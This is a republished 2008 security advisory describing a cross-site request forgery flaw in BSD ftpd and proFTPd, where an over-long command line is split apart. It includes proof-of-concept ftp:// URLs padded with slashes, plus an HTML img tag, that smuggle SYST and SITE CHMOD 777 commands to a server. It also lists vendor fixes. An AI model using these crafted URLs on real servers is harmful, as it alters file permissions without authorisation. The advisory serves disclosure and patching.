Bug: multiple vendor ftpd - Cross-site request forgery ( Ascii Version )

Search:
WLB2

multiple vendor ftpd - Cross-site request forgery

Published
Credit
Risk
2008.09.26
Maksymilian Arciemowicz
Medium
CWE
CVE
Local
Remote
CWE-352
CVE-2008-4247
CVE-2008-4242
No
Yes

[ multiple vendor ftpd - Cross-site request forgery ]

Author: Maksymilian Arciemowicz
Date:
- - Written: 03.09.2008
- - Public: 26.09.2008

CVE Ids:
CVE-2008-4247
CVE-2008-4242

Risk: Medium

Affected Software:
This problem has been discovered on OpenBSD 4.3 .
- - Affected systems:
+ OpenBSD
+ NetBSD
+ FreeBSD
+ some linux
- - Affected applications:
+ proFTPd
+ others


- --- 0.Description ---
ftpd -- Internet File Transfer Protocol server

The ftpd utility is the Internet File Transfer Protocol server process. The server uses the TCP protocol and listens at
the port specified with the -P option or in the ``ftp'' service specification; see services(5).

Cross-site request forgery, also known as one click attack, sidejacking or session riding and abbreviated as CSRF
(Sea-Surf[1]) or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a
user the website trusts. Contrary to cross-site scripting (XSS), which exploits the trust a user has for a particular
site, cross-site request forgery exploits the trust that a site has for a particular user.

http://en.wikipedia.org/wiki/Cross-site_request_forgery

- --- 1. ftpd bsd - Cross-site request forgery ---
The main problem exists in dividing long command for few others. The problem stems from the fact the use of the loop
for(;;) and function fgets().

Example:
Command
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA"

will be split for

500
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA': command not understood.
500
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'


When we try request to ftp deamon via browsers and path is longer 512<, our URL will be split.

/* FreeBSD 7.0 */
ftp://cxib@127.0.0.1////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////SYST

return result from SYST command:
215 UNIX Type: L8 Version: BSD-199506


/* NetBSD 4.0 */
ftp://ftp.netbsd.org////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////SYST

return result from SYST command:
215 UNIX Type: L8 Version: NetBSD-ftpd 20080609

The situation, can be dangerous, when this bug will be exploited like any CSRF attack. We can use SITE CHMOD command to
change file permission or other combinations with ftp commands. Only we need some exploit and luck, that admin will
executed exploited url.

How to exploit it?

0.
Creating some html file with <img> tags
<img src="ftp://.....////SITE%20CHMOD%20777%20FILENAME">
...

1.
Give preparing URL for user.

Example:
ftp://ftp.netbsd.org////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////SITE%20CHMOD%20777%20EXAMPLEFILE

will change permision to EXAMPLEFILE when the owner will use this URL.

I think, it should be some byte, what inform about overflowing (empty command should nulling this byte). We have
diagnosed this issue on BSD systems. Unfortunately, we do not know exactly how many machines can be affected.

- --- 2. How to fix ---
OpenBSD has been first informed. Fix is avalible on cvs:

http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/extern.h
http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpcmd.y

Thanks for OpenBSD Team.

NetBSD:
http://cvsweb.netbsd.org/bsdweb.cgi/src/libexec/ftpd/ftpd.c

proFTPd:
http://bugs.proftpd.org/show_bug.cgi?id=3115

We have informed only BSD developers and proFTPd Team.

- --- 3. Credit ---
Author: Maksymilian Arciemowicz

References:

http://bugs.proftpd.org/show_bug.cgi?id=3115
ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2008-014.txt.asc
http://security.FreeBSD.org/advisories/FreeBSD-SA-08:12.ftpd.asc
http://bugs.proftpd.org/show_bug.cgi?id=3115
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html
http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpd.c.diff?r1=1.183&r2=1.184&f=h
http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpcmd.y.diff?r1=1.51&r2=1.52&f=h
http://www.openbsd.org/cgi-bin/cvsweb/src/libexec/ftpd/ftpcmd.y

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version